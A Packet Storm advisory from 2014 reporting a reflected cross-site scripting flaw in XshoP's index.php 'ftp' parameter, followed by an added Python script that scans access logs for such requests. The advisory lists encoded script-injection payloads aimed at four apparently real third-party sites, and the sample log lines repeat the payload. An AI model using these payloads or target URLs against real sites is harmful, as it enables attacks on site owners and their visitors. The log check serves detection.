Xshop Cross Site Scripting

2014-05-12T00:00:00
ID PACKETSTORM:126593
Type packetstorm
Reporter Medrik
Modified 2014-05-12T00:00:00

Description

                                        
`# Exploit Title: Iran XshoP XSS Vulnerability  
# Google Dork: Dork Is PerSian ! See End Of Demo !  
# Date: 2014-03-27  
# Exploit Author: Medrik  
# Vendor Homepage: http://www.xshopsaz.ir/  
# Tested on: Windows  
  
  
-----------------  
  
Proof : Vulnerability in : index.php Page With (ftp) Parameter !  
  
Exploit : http://vulnerable_host/index.php?ftp=[XSS]  
  
  
-----------------  
  
D3m0 :  
  
  
http://powermc.net/index.php?ftp=%22%3E%3Cscript%3Ealert%28/Medrik/%29%3C/script%3E  
http://www.ebuy-internet.ir/index.php?ftp=%22%3E%3Cscript%3Ealert%28/Medrik/%29%3C/script%3E  
http://tak.kingshop92.ir/index.php?ftp=%22%3E%3Cscript%3Ealert%28/Medrik/%29%3C/script%3E  
http://www.mci5.net/index.php?ftp=%22%3E%3Cscript%3Ealert%28/Medrik/%29%3C/script%3E  
  
  
  
----  
  
  
Spc Tnx : Iran Security Team , Iranian Exploit Database , R.H.H   
Thanks : Enddo , Amir ,S!YOU.T4r.6T Explo!ter , Beni_vanda , Radical , YoSeF_HaCkeR  
  
  
./2014 , Grey Hat Boys  
`
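
A log check for requests that put HTML markup into the `ftp` parameter of index.php, as described above. This is an added example, not part of the original advisory or the vendor's code. It assumes Combined Log Format access logs and that `/` is also served by index.php; the function names are hypothetical and the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Client address and request target from a Combined Log Format line.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Characters that let a value leave an HTML attribute or open a tag.
HTML_BREAKOUT = re.compile("[<>\"']")

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/May/2014:10:00:01 +0000] "GET /index.php?ftp=%22%3E%3Cscript%3Ealert%28/Medrik/%29%3C/script%3E HTTP/1.1" 200 5120',
    '198.51.100.4 - - [12/May/2014:10:00:05 +0000] "GET /index.php?ftp=files HTTP/1.1" 200 4801',
    '203.0.113.9 - - [12/May/2014:10:00:09 +0000] "GET /?ftp=%253Cscript%253E HTTP/1.1" 200 5102',
    '198.51.100.8 - - [12/May/2014:10:00:12 +0000] "GET /search.php?ftp=%3Cb%3E HTTP/1.1" 404 312',
]

def fully_unquote(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is also caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def flag_ftp_xss(log_lines):
    """Return (client_ip, decoded_value) for suspicious index.php?ftp= requests."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        # Assumption: index.php is also the directory index, so "/" counts.
        if not url.path.lower().endswith(("/index.php", "/")):
            continue
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name == "ftp":
                decoded = fully_unquote(value)  # parse_qsl already decoded once
                if HTML_BREAKOUT.search(decoded):
                    hits.append((m.group("ip"), decoded))
    return hits

if __name__ == "__main__":
    for ip, value in flag_ftp_xss(SAMPLE_LOG):
        print(ip, repr(value))
```

Log matching only shows who sent such requests; the fix belongs in index.php, which should HTML-encode the `ftp` value wherever it is written into the page.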